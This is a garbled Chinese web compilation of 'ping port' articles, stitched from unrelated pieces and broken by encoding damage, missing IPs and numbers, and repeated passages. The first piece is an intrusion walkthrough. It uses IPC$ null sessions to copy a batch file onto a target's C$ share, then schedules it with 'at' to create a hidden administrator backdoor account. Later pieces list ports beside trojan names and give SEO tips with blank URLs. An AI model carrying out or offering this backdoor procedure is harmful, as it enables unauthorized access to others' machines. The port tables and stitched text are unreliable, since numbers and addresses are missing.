下面是范文網(wǎng)小編分享的ping端口號共6篇(Ping 端口號),供大家品鑒。

ping端口號共1
net view \\\\*.*.*.* 查看指定IP主機(jī)上的共享
nbtstat -A *.*.*.* 得到遠(yuǎn)程主機(jī)的NetBIOS用戶名列表
copy \\\\*.*.*.*\\\\Admin$\\\\system32 即將當(dāng)前目錄下的復(fù)制到對方Admin$共享的System32目錄內(nèi)
建立IPC$連接
例子: net use \\\\\\\\ipc$ "" /user:"administrator" 查看帳號— net user 建立帳號— net user name pawd /add 刪除帳號— net user name pawd /del 斷開連接:
鍵入“net use * /del”命令斷開所有的IPC$連接。鍵入“net use \\\\目標(biāo)IP\\\\IPC$ /del”可以刪除指定目標(biāo)IP的IPC$連接。
實(shí)例:建立后門帳號,步驟如下: (1)編寫B(tài)AT文件:
打開記事本,輸入“net user emile /add”和“net localgroup administrators emile /add”,然后把文件另存為“”,保存在cmd當(dāng)前默認(rèn)目錄下。 (2)與目標(biāo)主機(jī)建立IPC$連接,以為例:
打開cmd窗口,分別執(zhí)行命令:
net use \\\\\\\\ipc$ "" /user:"administrator" net use z: \\\\\\\\C$ (3)拷貝bat文件到目標(biāo)主機(jī):
在cmd窗口輸入copy \\\\\\\\C$,把文件拷貝到目標(biāo)位置;也可以打開映射驅(qū)動(dòng)器用圖形界面直接進(jìn)行拷貝操作。 (4)通過計(jì)劃任務(wù)使遠(yuǎn)程主機(jī)執(zhí)行文件:
首先鍵入“net time \\\\IP”查看遠(yuǎn)程主機(jī)的系統(tǒng)時(shí)間,再鍵入“at \\\\IP TIME COMMAND”命令在遠(yuǎn)程主機(jī)上建立計(jì)劃任務(wù)。
參數(shù)說明:IP—目標(biāo)主機(jī)IP;TIME—設(shè)定計(jì)劃任務(wù)執(zhí)行的時(shí)間;COMMAND—計(jì)劃任務(wù)要執(zhí)行的命令,如此處為C:\\\\。
計(jì)劃任務(wù)添加完畢后,使用命令“net use * /del”斷開IPC$連接。 (5)驗(yàn)證帳號是否成功建立:
等待一段時(shí)間,當(dāng)估計(jì)遠(yuǎn)程主機(jī)已經(jīng)執(zhí)行文件后,通過用新帳號建立IPC$連接來驗(yàn)證是否成功建立“emile”帳號,連接成功則說明帳號成功建立。
(3)獲取目標(biāo)主機(jī)上的用戶信息:和X-Scan是常用的兩款獲取用戶信息的工具。
是利用IPC$漏洞來查看目標(biāo)主機(jī)用戶信息的工具,通過USERINFO來查看目標(biāo)主機(jī)用戶信息的時(shí)候,并不需要事先建立IPC$空連接。 命令:USERINFO \\\\IP USER 用來查看目標(biāo)IP上USER用戶信息,然后根據(jù)反饋的結(jié)果進(jìn)行具體分析。
掃描器也是利用目標(biāo)主機(jī)存在的IPC$空連接漏洞,獲取用戶信息,用法略
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶 net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組 net user 用戶名 /delete 刪除用戶 net user 用戶名 /delete 刪除用戶 net user 用戶名 查看用戶的基本情況 net user 用戶名 /active:no 禁用該用戶 net user 用戶名 /active:yes 啟用該用戶
net share 查看計(jì)算機(jī)IPC$共享資源 net share 共享名 查看該共享的情況
net share 共享名=路徑 設(shè)置共享。例如 net share c$=c: net share 共享名 /delete 刪除IPC$共享
net use 查看IPC$連接情況
net use \\\\ip\\\\ipc$ "密碼" /user:"用戶名" ipc$連接
net time \\\\ip 查看遠(yuǎn)程計(jì)算機(jī)上的時(shí)間
copy 路徑:\\\\文件名 \\\\ip\\\\共享名 復(fù)制文件到已經(jīng)ipc$連接的計(jì)算機(jī)上
net view ip 查看計(jì)算機(jī)上的共享資源
ftp 服務(wù)器地址 進(jìn)入FTP服務(wù)器
at 查看自己計(jì)算機(jī)上的計(jì)劃作業(yè)
at \\\\ip 查看遠(yuǎn)程計(jì)算機(jī)上的計(jì)劃作業(yè)
at \\\\ip 時(shí)間 命令(注意加盤符) 在遠(yuǎn)程計(jì)算機(jī)上加一個(gè)作業(yè) at \\\\ip 計(jì)劃作業(yè)ID /delete 刪除遠(yuǎn)程計(jì)算機(jī)上的一個(gè)計(jì)劃作業(yè) at \\\\ip all /delete 刪除遠(yuǎn)程計(jì)算機(jī)上的全部計(jì)劃作業(yè)
ping端口號共2
菊花論壇--IT認(rèn)證家園 ? 『 思科認(rèn)證 』 ? 《 CCNA CCDA 》 ? TCP/IP TCP/IP端口大全
所有已知的端口號,協(xié)議
TCP 1=TCP Port Service Multiplexer TCP 2=Death TCP 5=Remote Job Entry,yoyo TCP 7=Echo TCP 11=Skun TCP 12=Bomber TCP 16=Skun TCP 17=Skun TCP 18=消息傳輸協(xié)議,skun TCP 19=Skun TCP 20=FTP Data,Amanda TCP 21=文件傳輸,Back Construction,Blade Runner,Doly Trojan,Fore,FTP trojan,Invisible FTP,Larva, WebEx,WinCrash TCP 22=遠(yuǎn)程登錄協(xié)議
TCP 23=遠(yuǎn)程登錄(Telnet),Tiny Telnet Server (= TTS) TCP 25=電子郵件(SMTP),Ajan,Antigen,Email Paword Sender,Happy 99,Kuang2,ProMail trojan,Shtrilitz,Stealth,Tapiras,Terminator,WinPC,WinSpy,Haebu Coceda TCP 27=Aasin TCP 28=Amanda TCP 29=MSG ICP TCP 30=Agent TCP 31=Agent 31,Hackers Paradise,Masters Paradise,Agent TCP 37=Time,ADM worm TCP 39=SubSARI TCP 41=DeepThroat,Foreplay TCP 42=Host Name Server TCP 43=WHOIS TCP 44=Arctic TCP 48=DRAT TCP 49=主機(jī)登錄協(xié)議 TCP 50=DRAT TCP 51=IMP Logical Addre Maintenance,Fuck Lamers Backdoor TCP 52=MuSka52,Skun TCP 53=DNS,Bonk (DOS Exploit) TCP 54=MuSka52 TCP 58=DMSetup TCP 59=DMSetup TCP 63=whois++ TCP 64=communications Integrator TCP 65=TACACS-Database Service TCP 66=Oracle SQL*NET,AL-Bareki TCP 67=Bootstrap Protocol Server TCP 68=Bootstrap Protocol Client TCP 69=,BackGate Kit,Nimda,Pasana,Storm,Storm worm,Theef, TCP 70=Gopher服務(wù),ADM worm TCP 79=用戶查詢(Finger),Firehotcker,ADM worm TCP 80=超文本服務(wù)器(Http),Executor,RingZero TCP 81=Chubo, TCP 82=Netsky-Z TCP 88=Kerberos krb5服務(wù) TCP 99=Hidden Port TCP 102=消息傳輸代理
TCP 108=SNA網(wǎng)關(guān)訪問服務(wù)器 TCP 109=Pop2 TCP 110=電子郵件(Pop3),ProMail TCP 113=Kazimas, Auther Idnet TCP 115=簡單文件傳輸協(xié)議
TCP 118=SQL Services, Infector TCP 119=新聞組傳輸協(xié)議(Newsgroup(Nntp)), Happy 99 TCP 121=JammerKiller, Bo jammerkillah TCP 123=網(wǎng)絡(luò)時(shí)間協(xié)議(NTP),Net Controller TCP 129=Paword Generator Protocol TCP 133=Infector TCP 135=微軟DCE RPC end-point mapper服務(wù)
TCP 137=微軟Netbios Name服務(wù)(網(wǎng)上鄰居傳輸文件使用) TCP 138=微軟Netbios Name服務(wù)(網(wǎng)上鄰居傳輸文件使用) TCP 139=微軟Netbios Name服務(wù)(用于文件及打印機(jī)共享) TCP 142=NetTaxi TCP 143=IMAP TCP 146=FC Infector,Infector TCP 150=NetBIOS Seion Service TCP 156=SQL服務(wù)器 TCP 161=Snmp TCP 162=Snmp-Trap TCP 170=A-Trojan TCP 177=X Display管理控制協(xié)議 TCP 179=Border網(wǎng)關(guān)協(xié)議(BGP) TCP 190=網(wǎng)關(guān)訪問控制協(xié)議(GACP) TCP 194=Irc TCP 197=目錄定位服務(wù)(DLS) TCP 256=Nirvana TCP 315=The Invasor TCP 371=ClearCase版本管理軟件
TCP 389=Lightweight Directory Acce Protocol (LDAP) TCP 396=Novell Netware over IP TCP 420=Breach TCP 421=TCP Wrappers TCP 443=安全服務(wù)
TCP 444=Simple Network Paging Protocol(SNPP) TCP 445=Microsoft-DS TCP 455=Fatal Connections TCP 456=Hackers paradise,FuseSpark TCP 458=蘋果公司QuickTime TCP 513=Grlogin TCP 514=RPC Backdoor TCP 520=Rip TCP 531=Rasmin,Net666 TCP 544=kerberos kshell TCP 546=DHCP Client TCP 547=DHCP Server TCP 548=Macintosh文件服務(wù)
TCP 555=Ini-Killer,Phase Zero,Stealth Spy TCP 569=MSN TCP 605=SecretService TCP 606=Noknok8 TCP 660=DeepThroat TCP 661=Noknok8 TCP 666=Attack FTP,Satanz Backdoor,Back Construction,Dark Connection Inside TCP 667= TCP 668=Noknok6 TCP 669=DP trojan TCP 692=GayOL TCP 707=Welchia,nachi TCP 777=AIM Spy TCP 808=RemoteControl,WinHole TCP 815=Everyone Darling TCP 901= TCP 911=Dark Shadow TCP 993=IMAP TCP 999=DeepThroat TCP 1000=Der Spaeher TCP 1001=Silencer,WebEx,Der Spaeher TCP 1003=BackDoor TCP 1010=Doly TCP 1011=Doly TCP 1012=Doly TCP 1015=Doly TCP 1016=Doly TCP 1020=Vampire TCP 1023= TCP 1024=(YAI) TCP 1059=nimreg //TCP 1025=,Unused Windows Services Block //TCP 1026=Unused Windows Services Block //TCP 1027=Unused Windows Services Block //TCP 1028=Unused Windows Services Block //TCP 1029=Unused Windows Services Block //TCP 1030=Unused Windows Services Block //TCP 1033=Netspy //TCP 1035=Multidropper //TCP 1042=Bla //TCP 1045=Rasmin //TCP 1047=GateCrasher //TCP 1050=Minicommand TCP 1058=nim TCP 1069= TCP 1070=Voice,Psyber Stream Server,Streaming Audio Trojan TCP 1079=ASPROVATalk TCP 1080=Wingate,, //TCP 1090=Xtreme, VDOLive //TCP 1092=LoveGate //TCP 1095=Rat //TCP 1097=Rat //TCP 1098=Rat //TCP 1099=Rat TCP 1109=Pop with Kerberos TCP 1110=nfsd-keepalive TCP 1111= TCP 1155=Network File Acce //TCP 1170=Psyber Stream Server,Streaming Audio trojan,Voice //TCP 1200=NoBackO //TCP 1201=NoBackO //TCP 1207=Softwar //TCP 1212=Nirvana,Visul Killer //TCP 1234=Ultors //TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse //TCP 1245=VooDoo Doll //TCP 1269=Mavericks Matrix //TCP 1313=Nirvana //TCP 1349=BioNet TCP 1352=Lotus Notes TCP 1433=Microsoft SQL Server TCP 1434=Microsoft SQL Monitor //TCP 1441=Remote Storm //TCP 1492=FTP99CMP() TCP 1503=NetMeeting //TCP 1509=Psyber Streaming Server TCP 1570=Orbix Daemon //TCP 1600=Shivka-Burka //TCP 1703=Exloiter TCP 1720=NetMeeting call Setup TCP 1731=NetMeeting音頻調(diào)用控制
TCP 1745=ISA Server proxy autoconfig, Remote Winsock //TCP 1807=SpySender TCP 1906=Backdoor/ TCP 1907=Backdoor/ //TCP 1966=Fake FTP 2000 //TCP 1976=Custom port //TCP 1981=Shockrave TCP 1990=stun-p1 cisco STUN Priority 1 port TCP 1990=stun-p1 cisco STUN Priority 1 port TCP 1991=stun-p2 cisco STUN Priority 2 port TCP 1992=stun-p3 cisco STUN Priority 3 port,ipsendmsg IPsendmsg TCP 1993=snmp-tcp-port cisco SNMP TCP port TCP 1994=stun-port cisco serial tunnel port TCP 1995=perf-port cisco perf port TCP 1996=tr-rsrb-port cisco Remote SRB port TCP 1997=gdp-port cisco Gateway Discovery Protocol TCP 1998=x25-svc-port cisco service (XOT) //TCP 1999=BackDoor, TransScout //TCP 2000=Der Spaeher,INsane Network TCP 2002= @mm //TCP 2001=Transmion scout //TCP 2002=Transmion scout //TCP 2003=Transmion scout //TCP 2004=Transmion scout //TCP 2005=TTransmion scout TCP 2011=cypre TCP 2015=raid-cs //TCP 2023=Ripper,Pa Ripper,Hack City Ripper Pro TCP 2049=NFS //TCP 2115=Bugs //TCP 2121=Nirvana //TCP 2140=Deep Throat, The Invasor //TCP 2155=Nirvana //TCP 2208=RuX //TCP 2255=Illusion Mailer //TCP 2283=HVL Rat5 //TCP 2300=PC Explorer //TCP 2311=Studio54 TCP 2556= //TCP 2565=Striker //TCP 2583=WinCrash //TCP 2600=Digital RootBeer //TCP 2716=Prayer Trojan TCP 2745= //TCP 2773=Backdoor,SubSeven //TCP 2774=& //TCP 2801=Phineas Phucker TCP 2967=SSC Agent //TCP 2989=Rat //TCP 3024=WinCrash trojan TCP 3127= TCP 3128=RingZero, //TCP 3129=Masters Paradise //TCP 3150=Deep Throat, The Invasor TCP 3198= //TCP 3210=SchoolBus TCP 3332= TCP 3333=Prosiak TCP 3389=超級終端 //TCP 3456=Terror //TCP 3459=Eclipse 2000 //TCP 3700=Portal of Doom //TCP 3791=Eclypse //TCP 3801=Eclypse TCP 3996=Portal of Doom,RemoteAnything TCP 4000=騰訊QQ客戶端
TCP 4060=Portal of Doom,RemoteAnything TCP 4092=WinCrash TCP 4242=VHM TCP 4267=& TCP 4321=BoBo TCP 4444=Prosiak,Swift remote TCP 4500= TCP 4567=File Nail TCP 4661=Backdoor/ TCP 4590=ICQTrojan TCP 4899=Remote Administrator服務(wù)器 TCP 4950=ICQTrojan TCP 5000=WindowsXP服務(wù)器,Blazer 5,Bubbel,Back Door Setup,Sockets de Troie TCP 5001=Back Door Setup, Sockets de Troie TCP 5002=cd00r,Shaft TCP 5011=One of the Last Trojans (OOTLT) TCP 5025=WM Remote KeyLogger TCP 5031=Firehotcker,Metropolitan,NetMetro TCP 5032=Metropolitan TCP 5190=ICQ Query TCP 5321=Firehotcker TCP 5333=Backage Trojan Box 3 TCP 5343=WCrat TCP 5400=Blade Runner, TCP 5401=Blade Runner,Back Construction TCP 5402=Blade Runner,Back Construction TCP 5471=WinCrash TCP 5512=Illusion Mailer TCP 5521=Illusion Mailer TCP 5550=Xtcp,INsane Network TCP 5554= TCP 5555=ServeMe TCP 5556=BO Facil TCP 5557=BO Facil TCP 5569=Robo-Hack TCP 5598=BackDoor TCP 5631=PCAnyWhere data TCP 5632=PCAnyWhere TCP 5637=PC Crasher TCP 5638=PC Crasher TCP 5698=BackDoor TCP 5714=Wincrash3 TCP 5741=WinCrash3 TCP 5742=WinCrash TCP 5760=Portmap Remote Root Linux Exploit TCP 5880=Y3K RAT TCP 5881=Y3K RAT TCP 5882=Y3K RAT TCP 5888=Y3K RAT TCP 5889=Y3K RAT TCP 5900=WinVnc TCP 6000= TCP 6006=Noknok8 TCP 6129=Dameware Nt Utilities服務(wù)器 TCP 6272=SecretService TCP 6267=廣外女生
TCP 6400=,The Thing TCP 6500=Devil TCP 6661=Teman TCP 6666= TCP 6667=NT Remote Control,Wise 播放器接收端口 TCP 6668=Wise Video廣播端口 TCP 6669=Vampyre TCP 6670=DeepThroat,iPhone TCP 6671=Deep Throat TCP 6711=SubSeven TCP 6712= TCP 6713=SubSeven TCP 6723=Mstream TCP 6767=NT Remote Control TCP 6771=DeepThroat TCP 6776=BackDoor-G,SubSeven,2000 Cracks TCP 6777= TCP 6789=Doly Trojan TCP 6838=Mstream TCP 6883=DeltaSource TCP 6912=Shit Heep TCP 6939=Indoctrination TCP 6969=GateCrasher, Priority, IRC 3 TCP 6970=RealAudio,GateCrasher TCP 7000=Remote Grab,NetMonitor, TCP 7001=Freak88 TCP 7201=NetMonitor TCP 7215=BackDoor-G, SubSeven TCP 7001=Freak88,Freak2k TCP 7300=NetMonitor TCP 7301=NetMonitor TCP 7306=NetMonitor,NetSpy TCP 7307=NetMonitor, ProcSpy TCP 7308=NetMonitor, X Spy TCP 7323=Sygate服務(wù)器端 TCP 7424=Host Control TCP 7511=聰明基因 TCP 7597=Qaz TCP 7609=Snid X2 TCP 7626=冰河
TCP 7777=The Thing TCP 7789=Back Door Setup, ICQKiller TCP 7983=Mstream TCP 8000=騰訊OICQ服務(wù)器端,XDMA TCP 8010=Wingate,Logfile TCP 8011= TCP 8080=WWW 代理,Ring Zero,Chubo, TCP 8102=網(wǎng)絡(luò)神偷
TCP [email=8181=@mm]8181=@mm[/email] TCP 8520= TCP 8594=I-Worm/ TCP 8787=BackOfrice 2000 TCP 8888=Winvnc TCP 8897=Hack Office,Armageddon TCP 8989=Recon TCP 9000=Netministrator TCP 9325=Mstream TCP 9400=Incommand TCP 9401=Incommand TCP 9402=Incommand TCP 9872=Portal of Doom TCP 9873=Portal of Doom TCP 9874=Portal of Doom TCP 9875=Portal of Doom TCP 9876=Cyber Attacker TCP 9878=TransScout TCP 9989=Ini-Killer TCP 9898= TCP 9999=Prayer Trojan TCP =Portal of Doom TCP = TCP =Syphillis TCP =Syphillis TCP =Syphillis TCP =BrainSpy TCP =Portal Of Doom TCP =.c, TCP =Acid Shivers TCP =coma trojan TCP =Ambush TCP =Senna Spy TCP =Host Control TCP =Host Control TCP =Progenic,Hack '99KeyLogger TCP =TROJ_ TCP =Gjamer, TCP =Hack'99 KeyLogger TCP =GabanBus, NetBus /, Pie Bill Gates, X-bill TCP =GabanBus, NetBus /, X-bill TCP =BioNet TCP =Whack-a-mole TCP =Whack-a-mole TCP =Whack-a-mole TCP [email==W32/Gibe@MM]=W32/Gibe@MM[/email] TCP =NetBus TCP =DUN Control TCP =Buttman TCP =WhackJob, TCP =Eclipse2000 TCP =Mstream TCP =Senna Spy TCP =Hacker Brazil TCP =Psychward TCP =Tribal Voice的聊天程序PowWow TCP =Kuang2 The Virus TCP =Solero TCP =PC Invader TCP =PC Invader TCP =PC Invader TCP =PC Invader TCP =NetDaemon TCP =Host Control TCP =Mstream TCP =Mosucker TCP =Stacheldraht (DDoS) TCP =ICQ Revenge TCP =Priority TCP =Priority TCP =提供廣告服務(wù)的Conducent"adbot"共享軟件 TCP =Mosaic TCP =Kuang2 The Virus TCP =CrazyNet TCP =CrazyNet TCP =Infector + TCP =Nephron TCP =Shaft (DDoS) TCP =藍(lán)色火焰 TCP =ICQ Revenge TCP =Millennium II (GrilFriend) TCP =Millennium II (GrilFriend) TCP =AcidkoR TCP =NetBus 2 Pro TCP =Lovgate TCP =Logged,Chupacabra TCP =Bla TCP =Shaft (DDoS) TCP = TCP =Tribal Flood Network,Trinoo TCP =Schwindler ,GirlFriend TCP =Schwindler ,GirlFriend,Exloiter TCP =Prosiak,RuX Uploader TCP = TCP =Asylum TCP =網(wǎng)絡(luò)公牛
TCP =Evil FTP, Ugly FTP, WhackJob TCP =Donald Dick TCP =Donald Dick TCP =INet Spy TCP =Delta TCP =Spy Voice TCP =Sub Seven +, TCP =Tribal Flood Network,Trinoo TCP =Tribal Flood Network,Trinoo TCP =Hack Attack TCP =Hack Attack TCP =Host Control TCP =TROJ_ TCP =The Unexplained TCP =Terr0r32 TCP =Death,Lamers Death TCP =AOL trojan TCP =NetSphere ,NetSphere TCP =NetSphere ,NetSphere TCP =NetSphere ,NetSphere TCP =NetSphere TCP =Sockets de Troie TCP = TCP =Intruse TCP =Kuang2 TCP =Bo Whack TCP =Baron Night,BO client,BO2,Bo Facil,BackFire,Back Orifice,DeepBO,Freak2k,NetSpy TCP =NetSpy,Back Orifice,DeepBO TCP =NetSpy DK TCP =Schwindler TCP =BOWhack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =PeanutBrittle TCP =Acid Battery TCP =Prosiak,Blakharaz TCP =Son Of Psychward TCP =Son Of Psychward TCP =Spirit 2001a TCP =BigGluck,TN,Tiny Telnet Server TCP =Trin00 (Windows) (DDoS) TCP =Trin00 (Windows) (DDoS) TCP = TCP =YAT TCP =The Spy TCP =Agent ,Masters TCP =Masters Paradise TCP =Masters TCP =Masters Paradise TCP =Masters Paradise TCP =Remote Boot TCP =Schoolbus / TCP =Delta Source TCP =Happypig TCP =未知代理 TCP =Prosiak TCP =Delta TCP =BirdSpy2 TCP =Online Keylogger TCP =Sockets de Troie TCP =Fore, Schwindler TCP =CafeIni TCP =Remote Windows Shutdown TCP =Acid Battery 2000 TCP =Back Door-G, Sub7 TCP =Back Orifice 2000,Sheep TCP =School Bus .,Sheep, BO2K TCP =NetRaider TCP = TCP = TCP =ButtFunnel TCP = TCP =Deep Throat TCP =Xzip TCP =Connection TCP =TROJ_ TCP =Telecommando TCP =Bunker-kill TCP =Bunker-kill TCP =Devil, DDoS TCP =Th3tr41t0r, The Traitor TCP =TROJ_ TCP =RC,Adore Worm/Linux TCP =ShitHeep TCP =Armageddon,Hack Office UDP 1=Sockets des Troie UDP 9=Chargen UDP 19=Chargen UDP 69=Pasana UDP 80=Penrox UDP 371=ClearCase版本管理軟件
UDP 445=公共Internet文件系統(tǒng)(CIFS) UDP 500=Internet密鑰交換
UDP 1025=Maverick's Matrix - UDP 1026=Remote Explorer 2000 UDP 1027=UC聊天軟件, UDP 1028=3721上網(wǎng)助手(用途不明,建議用戶警惕!),KiLo,SubSARI UDP 1029=SubSARI UDP 1031=Xot UDP 1032=Akosch4 UDP 1104=RexxRave UDP 1111=Daodan UDP 1116=Lurker UDP 1122=Last 2000,Singularity UDP 1183=Cyn,SweetHeart UDP 1200=NoBackO UDP 1201=NoBackO UDP 1342=BLA trojan UDP 1344=Ptakks UDP 1349=BO dll UDP 1561=MuSka52 UDP 1772=NetControle UDP 1978=Slapper UDP 1985=Black Diver UDP 2000=A-trojan,Fear,Force,GOTHIC Intruder,Last 2000,Real 2000 UDP 2001=Scalper UDP 2002=Slapper UDP 2015=raid-cs UDP 2018=rellpack UDP 2130=Mini BackLash UDP 2140=Deep Throat,Foreplay,The Invasor UDP 2222=SweetHeart,Way,Backdoor/ UDP 2339=Voice Spy UDP 2702=Black Diver UDP 2989=RAT UDP 3150=Deep Throat UDP 3215=XHX UDP 3333=Daodan UDP 3801=Eclypse UDP 3996=Remote Anything UDP 4128=RedShad UDP 4156=Slapper UDP 4500=sae-urn UDP 5419=DarkSky UDP 5503=Remote Shell Trojan UDP 5555=Daodan UDP 5882=Y3K RAT UDP 5888=Y3K RAT UDP 6112= Game UDP 6666=KiLo UDP 6667=KiLo UDP 6766=KiLo UDP 6767=KiLo,UandMe UDP 6838=Mstream Agent-handler UDP 7028=未知木馬 UDP 7424=Host Control UDP 7788=Singularity UDP 7983=MStream handler-agent UDP 8012=Ptakks UDP 8090=Aphex's Remote Packet Sniffer UDP 8127=9_119,Chonker UDP 8488=KiLo UDP 8489=KiLo UDP 8787=BackOrifice 2000 UDP 8879=BackOrifice 2000 UDP 9325=MStream Agent-handler UDP =XHX UDP =Portal of Doom UDP =Syphillis UDP =Slapper UDP =Portal of Doom UDP =Mstream UDP =Ambush UDP =Cyn UDP =Proto UDP =BlueIce 2000 UDP [email==W32/Gibe@MM]=W32/Gibe@MM[/email] UDP =ButtMan,DUN Control UDP =UDP remote shell backdoor server UDP =KiLo UDP =KiLo UDP =KiLo UDP =Shaft handler to Agent UDP =Shaft UDP =GirlFriend UDP = UDP =Donald Dick UDP =MOTD UDP =Delta Source UDP =Sub-7 UDP =Trin00/TFN2K UDP =Sub-7 UDP =Alvgus trojan 2000 UDP =Trinoo UDP =KiLo UDP =The Unexplained UDP =NetSphere UDP =Little Witch UDP =Trin00 DoS Attack UDP =Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO UDP =Back Orifice, NetSpy DK, DeepBO UDP =Little Witch UDP =Little Witch UDP =Lithium UDP =Hack aTack UDP =Hack aTack UDP =Hack aTack UDP =Hack aTack UDP =未知木馬 UDP =Trinoo UDP =Trinoo UDP =KiLo UDP =Iani UDP =School Bus UDP =Taskman UDP =Delta Source UDP =KiLo UDP =OnLine keyLogger UDP =Fenster UDP =KiLo UDP =Omega UDP =Back Orifice UDP =Back Orifice 2000 UDP =NetRaider Trojan UDP =KiLO UDP =KiLO UDP =KiLO UDP =The Traitor
ping端口號共3
作為一名站長,當(dāng)大家發(fā)表了新的(尤其是原創(chuàng))文章時(shí),大家心里面首先想到的,我想不一例外是,搜索引擎怎么才能快速爬取我的文章呢?當(dāng)然,如果你是高權(quán)重網(wǎng)站,請點(diǎn)擊右上角的XX,如果你是新人,或是被這個(gè)問題迷惑的人,那么,今天就讓蝸牛SEO來給你分享一下自己的方法吧!被搜索引擎快速爬取主要有如下六種方法:
1.使用搜索引擎的ping服務(wù)。
你可以采取手動(dòng)通知和自動(dòng)通知兩種方式使用ping服務(wù):
手動(dòng)ping:訪問搜索引擎的ping頁面,在輸入框中輸入博客地址或者feed地址,點(diǎn)擊“提交博客”按鈕即可。
自動(dòng)ping:如果您的博客程序支持自動(dòng)ping功能,您只需把百度的Ping服務(wù)地址配置到你的Blog發(fā)布后臺(tái)或者客戶端程序中,就可以實(shí)現(xiàn)自動(dòng)通知的功能。
以下為各家搜索引擎的ping服務(wù)地址:
百度:
谷歌:
搜狗:
(2).SOCKS代理協(xié)議服務(wù)器常用端口號:1080 (3).FTP(文件傳輸)協(xié)議代理服務(wù)器常用端口號:21 (4).Telnet(遠(yuǎn)程登錄)協(xié)議代理服務(wù)器常用端口:23
HTTP服務(wù)器,默認(rèn)的端口號為80/tcp(木馬Executor開放此端口);
HTTPS(securely transferring web pages)服務(wù)器,默認(rèn)的端口號為443/tcp 443/udp;
Telnet(不安全的文本傳送),默認(rèn)端口號為23/tcp(木馬Tiny Telnet Server所開放的端口);
fTP,默認(rèn)的端口號為21/tcp(木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的端口);
TFTP(Trivial File Transfer Protocol ),默認(rèn)的端口號為69/udp;
SSH(安全登錄)、SCP(文件傳輸)、端口重定向,默認(rèn)的端口號為22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默認(rèn)的端口號為25/tcp(木馬Antigen、Email Paword Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個(gè)端口);
POP3 Post Office Protocol (E-mail) ,默認(rèn)的端口號為110/tcp;
WebLogic,默認(rèn)的端口號為7001;
Webshpere應(yīng)用程序,默認(rèn)的端口號為9080;
Webshpere管理工具,默認(rèn)的端口號為9090;
JBOSS,默認(rèn)的端口號為8080;
TOMCAT,默認(rèn)的端口號為8080;
WIN2003遠(yuǎn)程登陸,默認(rèn)的端口號為3389;
Symantec AV/Filter for MSE ,默認(rèn)端口號為 8081;
Oracle 數(shù)據(jù)庫,默認(rèn)的端口號為1521;
ORACLE EMCTL,默認(rèn)的端口號為1158;
Oracle XDB( XML 數(shù)據(jù)庫),默認(rèn)的端口號為8080;
Oracle XDB FTP服務(wù),默認(rèn)的端口號為2100;
MS SQL*SERVER數(shù)據(jù)庫server,默認(rèn)的端口號為1433/tcp 1433/udp;
MS SQL*SERVER數(shù)據(jù)庫monitor,默認(rèn)的端口號為1434/tcp 1434/udp;
QQ,默認(rèn)的端口號為1080/udp.代理服務(wù)器常用以下端口:
(1).HTTP
協(xié)議代理服務(wù)器常用端口號:80/8080/3128/8081/9080
(2).SOCKS代理協(xié)議服務(wù)器常用端口號:1080 (3).FTP(文件傳輸)協(xié)議代理服務(wù)器常用端口號:21 (4).Telnet(遠(yuǎn)程登錄)協(xié)議代理服務(wù)器常用端口:23
HTTP服務(wù)器,默認(rèn)的端口號為80/tcp(木馬Executor開放此端口);
HTTPS(securely transferring web pages)服務(wù)器,默認(rèn)的端口號為443/tcp 443/udp;
Telnet(不安全的文本傳送),默認(rèn)端口號為23/tcp(木馬Tiny Telnet Server所開放的端口);
fTP,默認(rèn)的端口號為21/tcp(木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的端口);
TFTP(Trivial File Transfer Protocol ),默認(rèn)的端口號為69/udp;
SSH(安全登錄)、SCP(文件傳輸)、端口重定向,默認(rèn)的端口號為22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默認(rèn)的端口號為25/tcp(木馬Antigen、Email Paword Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個(gè)端口);
POP3 Post Office Protocol (E-mail) ,默認(rèn)的端口號為110/tcp;
WebLogic,默認(rèn)的端口號為7001;
Webshpere應(yīng)用程序,默認(rèn)的端口號為9080;
Webshpere管理工具,默認(rèn)的端口號為9090;
JBOSS,默認(rèn)的端口號為8080;
TOMCAT,默認(rèn)的端口號為8080; WIN2003遠(yuǎn)程登陸,默認(rèn)的端口號為3389;
Symantec AV/Filter for MSE ,默認(rèn)端口號為 8081;
Oracle 數(shù)據(jù)庫,默認(rèn)的端口號為1521;
ORACLE EMCTL,默認(rèn)的端口號為1158;
Oracle XDB( XML 數(shù)據(jù)庫),默認(rèn)的端口號為8080;
Oracle XDB FTP服務(wù),默認(rèn)的端口號為2100;
MS SQL*SERVER數(shù)據(jù)庫server,默認(rèn)的端口號為1433/tcp 1433/udp;
MS SQL*SERVER數(shù)據(jù)庫monitor,默認(rèn)的端口號為1434/tcp 1434/udp;
QQ,默認(rèn)的端口號為1080/udp.
(注:本數(shù)據(jù)收集于中國黑客聯(lián)盟)
ping端口號共4
